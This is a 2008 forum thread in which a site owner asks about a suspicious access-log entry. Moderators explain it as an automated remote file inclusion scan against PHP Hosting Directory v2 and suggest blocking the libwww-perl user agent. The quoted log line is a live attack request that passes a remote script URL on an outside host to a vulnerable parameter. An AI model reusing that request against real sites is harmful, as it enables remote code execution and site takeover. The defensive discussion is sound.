| Author |
Message |
Unit1 Regular


Joined: Oct 26, 2004 Posts: 75 Location: Boston
|
Posted:
Sat Aug 16, 2008 7:38 pm |
|
Can some one let me know what they are trying to do ? I am seeing a lot of this on my site
| Quote: | | 85.12.15.28 - - [16/Aug/2008:15:22:05 -0600] "GET //phphost_directoryv2/include/admin.php?rd=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 500 823 "-" "libwww-perl/5.810" |
Thanks for any info |
|
|
|
 |
evaders99 Moderator

Joined: Apr 30, 2004 Posts: 2844
|
Posted:
Sat Aug 16, 2008 9:54 pm |
|
Remote File Inclusion
PHP Hosting Directory v2
Robots don't care you aren't using this software.. they just scan every site and if you happen to use it, bingo... easy hacked site |
|
|
|
 |
Unit1 Regular


Joined: Oct 26, 2004 Posts: 75 Location: Boston
|
Posted:
Tue Aug 19, 2008 5:55 pm |
|
Thank you evaders99 for the info
I did ban the ips but now it is coming from others here in the USA what is the best way to stop this completely on the site |
|
|
|
 |
kguske Site Admin

Joined: Jun 04, 2004 Posts: 4848
|
Posted:
Tue Aug 19, 2008 6:51 pm |
|
Probably using spoofed IPs, so blocking won't help. |
|
|
|
 |
evaders99 Moderator

Joined: Apr 30, 2004 Posts: 2844
|
Posted:
Tue Aug 19, 2008 7:03 pm |
|
Or hacked servers by this botnet
You should use NukeSentinel or .htaccess rules to block libwww-perl |
|
|
|
 |
Unit1 Regular


Joined: Oct 26, 2004 Posts: 75 Location: Boston
|
Posted:
Sat Aug 23, 2008 8:12 pm |
|
Thank you both for the help I should of did a search of the site on this problem as you have answered this problem many times in the past. As I get older I forget more. adding the block I now see just one in the logs instead of many
Stay safe and have a great day |
|
|
|
 |
|
|
|
|